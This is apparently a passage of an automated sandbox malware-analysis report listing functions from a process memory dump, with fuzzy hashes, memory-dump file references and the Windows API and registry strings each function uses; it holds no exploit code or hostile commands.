Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Function 00C0FC30 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Function 00C11D80 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Function 00C0FD8C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Function 00C0FD5C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Function 00C0FED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Function 00C0FEA0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Function 00C0FE24 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Function 00C0FFFC Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Function 00C0FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Function 00C0FF34 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Function 00C38788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT ref: 00C38891
_wcspbrk.LIBCMT ref: 00C38979
_wcspbrk.LIBCMT ref: 00C38A61
_wcspbrk.LIBCMT ref: 00C38A9B
_wcspbrk.LIBCMT ref: 00C81B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 00C387E6
Kernel-MUI-Language-Allowed, xrefs: 00C38827
Kernel-MUI-Language-SKU, xrefs: 00C389FC
Kernel-MUI-Language-Disallowed, xrefs: 00C38914
WindowsExcludedProcs, xrefs: 00C387C1

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 85308ed70447cb0b30fe897f987a6c8519458209027fb899f9c78161e5551abe
Instruction ID: 35837e1b496db5eb4eb4c5da984caad7476fda4ec7a840242bc491d858fc988b
Opcode Fuzzy Hash: 85308ed70447cb0b30fe897f987a6c8519458209027fb899f9c78161e5551abe
Instruction Fuzzy Hash: A6F1F7B2D10209EFCF11EF95C9819EEB7B8FF08304F14446AF915A7211EB35AA45EB60

Function 00CA822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 00CA8240
_wcsnlen.LIBCMT ref: 00CA825C

Strings

TimeZoneKeyName, xrefs: 00CA836A, 00CA839B
DaylightName, xrefs: 00CA8309
DaylightBias, xrefs: 00CA8324
StandardName, xrefs: 00CA82A8
DynamicDaylightTimeDisabled, xrefs: 00CA83C1
DaylightStart, xrefs: 00CA8341
StandardStart, xrefs: 00CA82E5
Bias, xrefs: 00CA8282
StandardBias, xrefs: 00CA82C7

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: _wcsnlen
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
API String ID: 3628947076-1387797911
Opcode ID: 152314ad699351841822be8f5e7ddabf32a691e4a81780e280c7d312de616c72
Instruction ID: 67656cfbf26d114f71b7d333a3138f044b07e2f8122888f0b6fa7afcd67f3aa2
Opcode Fuzzy Hash: 152314ad699351841822be8f5e7ddabf32a691e4a81780e280c7d312de616c72
Instruction Fuzzy Hash: 4A41977524120ABFEB119A91CC82FDE7BAC9F06B4CF100921BB04D6191DBB0DB59B7A4

Function 00C513CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00C5146B
___swprintf_l.LIBCMT ref: 00C51490
___swprintf_l.LIBCMT ref: 00C7E970

Strings

:%u.%u.%u.%u, xrefs: 00C7E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 00C7E9B0
::%hs%u.%u.%u.%u, xrefs: 00C7E967
ffff:, xrefs: 00C7E94B

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 929264c9b8ac3712eddc12a17eb923d15efde7794e8b9c645319f9307d8aa38e
Instruction ID: 6552afc10a928bb5a16abf3f85a9947dbc4775e34580338dd031e4f8889eeef9
Opcode Fuzzy Hash: 929264c9b8ac3712eddc12a17eb923d15efde7794e8b9c645319f9307d8aa38e
Instruction Fuzzy Hash: C46176B6900645AACF24DF5AC8948BFBBB5EF95301B18C12DFDEA47540D334AB84DB60

Function 00CB3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00CB3C2C
___swprintf_l.LIBCMT ref: 00CB3C68
___swprintf_l.LIBCMT ref: 00CB3D09
___swprintf_l.LIBCMT ref: 00CB3D31
___swprintf_l.LIBCMT ref: 00CB3D56
___swprintf_l.LIBCMT ref: 00CB3D8D

Strings

:%u.%u.%u.%u, xrefs: 00CB3D84
ffff:, xrefs: 00CB3C06, 00CB3C22
::%hs%u.%u.%u.%u, xrefs: 00CB3C23
::ffff:0:%u.%u.%u.%u, xrefs: 00CB3C5F

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f8182507b7309f75bbc300c3d39828a02f785819c8a2fbcd8c30bf6e0634813d
Instruction ID: ee9e8d2ed6c0359a912abdf7098ca369c6a0cd4dccd85926ad74ace5697651a8
Opcode Fuzzy Hash: f8182507b7309f75bbc300c3d39828a02f785819c8a2fbcd8c30bf6e0634813d
Instruction Fuzzy Hash: 2D619376900688ABCF24DFA9C8518FEBFF5EF55310F14C629F8A9A7541E234EB409B50

Function 00C47EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00C63F12

Strings

ExecuteOptions, xrefs: 00C63F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00C63EC4
CLIENT(ntdll): Processing section info %ws..., xrefs: 00C6E345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00C6E2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00C63F75
Execute=1, xrefs: 00C63F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00C63F4A

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 73b20fac2eca2f4c93cd4ff081f9e5accdb8fdb14991fdce0a8629d21d175da6
Instruction ID: ba2a78bfe353bcc139787436494898e98ce47e3e4e7efe85338e31e23773d45e
Opcode Fuzzy Hash: 73b20fac2eca2f4c93cd4ff081f9e5accdb8fdb14991fdce0a8629d21d175da6
Instruction Fuzzy Hash: A841CA7268061C7AEF20DAD4DCC6FEB73BCAF55700F0005A9B505E61D1EB709B859B61

Function 00C50B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00C50BF6
__fassign.LIBCMT ref: 00C50CA2

Strings

:, xrefs: 00C50AC7
:, xrefs: 00C50BA9
., xrefs: 00C50A0C

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 527d9ee09411949f57536dcf7975df6a074e0ec62eeb3003e7cb8bd37117a521
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: E7A18F7990030ADBCF24CF58C8456BEB7B4AF06306F34856ADC52E7242D7306AC9DB5A

Function 00C50554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C72206

Strings

